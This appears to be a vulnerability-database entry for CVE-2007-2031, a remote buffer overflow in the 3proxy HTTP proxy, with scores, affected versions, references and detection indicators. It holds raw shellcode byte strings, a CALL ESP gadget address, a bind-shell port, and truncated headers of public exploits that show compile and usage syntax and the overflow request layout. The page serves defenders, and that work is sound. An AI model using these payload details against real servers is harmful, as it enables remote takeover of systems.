CVE-2007-2031
Published 2007-04-16
Priority: P3 · 56 · critical · CVSS 2.0 base score: 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available (see the Exploit-DB entries below)
EPSS: 15.31% (96.4th percentile)
Buffer overflow in the HTTP proxy service for 3proxy 0.5 to 0.5.3g, and 0.6b-devel before 20070413, might allow remote attackers to execute arbitrary code via crafted transparent requests.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 3proxy | 3proxy | <= 0.5.3g | — |
Detection & IOCs (extracted from sources)
- bytes: `\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b\x76\x8d\x13`
- bytes: `\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80`
- bytes: `\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80`
- The win32 exploit uses a 'CALL ESP' gadget at 0x7C81518B in kernel32.dll (WinXP SP2) as the EIP overwrite value. Presence of this address in network traffic targeting port 3128 is a strong indicator of exploitation.
- The win32 bind shellcode (Metasploit PexFnstenvSub encoded) opens a bind shell on port 7979. Monitor for unexpected listening services on port 7979 after 3proxy receives a malformed request.
- Affected versions are 3proxy 0.5 through 0.5.3g and 0.6b-devel before 20070413. The default proxy port is 3128 but may be reconfigured.
- The win32 exploit targets WinXP Home SP2 kernel32.dll CALL ESP gadgets; different Windows versions will have different gadget addresses and may require the -r option to specify an alternate return address.
No detection rules found.
Exploit-DB · 2007-05-02 · CVE-2007-2031
3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow
---
```c
/*
**
** Fedora Core 5,6 (exec-shield) based
** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit
** (reverse connect-back method) by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: https://www.securityfocus.com/bid/23545
** vendor: http://3proxy.ru/
**
** vade79/v9 [email protected] (fakehalo/realhalo)'s exploit:
** http://www.milw0rm.com/exploits/3821 (x3proxy.c)
**
** --
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** It is a relatively easy exploit case.
** It doesn't need any exec family functions
```
Exploit-DB · 2007-04-30 · CVE-2007-2031
3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow
---
```c
/*[ 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit. ]*
 *                                                                    *
 * by: vade79/v9 [email protected] (fakehalo/realhalo)                *
 *                                                                    *
 * compile:                                                           *
 *  gcc x3proxy-win32.c -o x3proxy-win32                              *
 *                                                                    *
 * syntax:                                                            *
 *  ./x3proxy-win32 [-pr] -h host                                     *
 *                                                                    *
 * sumus homepage/url:                                                *
 *  http://3proxy.ru/                                                 *
 *                                                                    *
 * 3Proxy tiny free proxy server previously known as 3[APA3A] tiny    *
 * freeware proxy.                                                    *
 *                                                                    *
 * I just saw a (gentoo) advisory, and got curious how easy it        *
 * would be to exploit this.  The vulnerability is fairly             *
 * trival(win32 version):                                             *
 *                                                                    *
 * ------------------------------------------------------------------ *
 *  GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n          *
 *  Host: [FILLERx999]\n\n                                            *
 * --------------------------
```
Exploit-DB · 2007-04-30 · CVE-2007-2031
3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow
---
```c
/*[ 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit. ]***
 *                                                               *
 * by: vade79/v9 [email protected] (fakehalo/realhalo)           *
 *                                                               *
 * compile:                                                      *
 *  gcc x3proxy.c -o x3proxy                                     *
 *                                                               *
 * syntax:                                                       *
 *  ./x3proxy [-pscr+] -h host                                   *
 *                                                               *
 * sumus homepage/url:                                           *
 *  http://3proxy.ru/                                            *
 *                                                               *
 * 3Proxy tiny free proxy server previously known as 3[APA3A]    *
 * tiny freeware proxy.                                          *
 *                                                               *
 * I just saw a (gentoo) advisory, and got curious how easy      *
 * it would be to exploit this.  The vulnerability is fairly     *
 * trival:                                                       *
 *                                                               *
 * ------------------------------------------------------------- *
 *  GET /[NOPS][SHELLCODE][RETADDR]\n                            *
 *  Host: [FILLER]\n\n                                           *
 * ------------------------------------------------------------- *
 *                                                               *
 * The length of "Host: [FILLER]" is
```
No writeups or analysis indexed.
References
- http://3proxy.ru/0.5.3h/Changelog.txt
- http://secunia.com/advisories/24961
- http://secunia.com/advisories/25001
- http://security.gentoo.org/glsa/glsa-200704-17.xml
- http://www.securityfocus.com/archive/1/466650/100/100/threaded
- http://www.securityfocus.com/bid/23545
- http://www.vupen.com/english/advisories/2007/1442
- https://exchange.xforce.ibmcloud.com/vulnerabilities/33841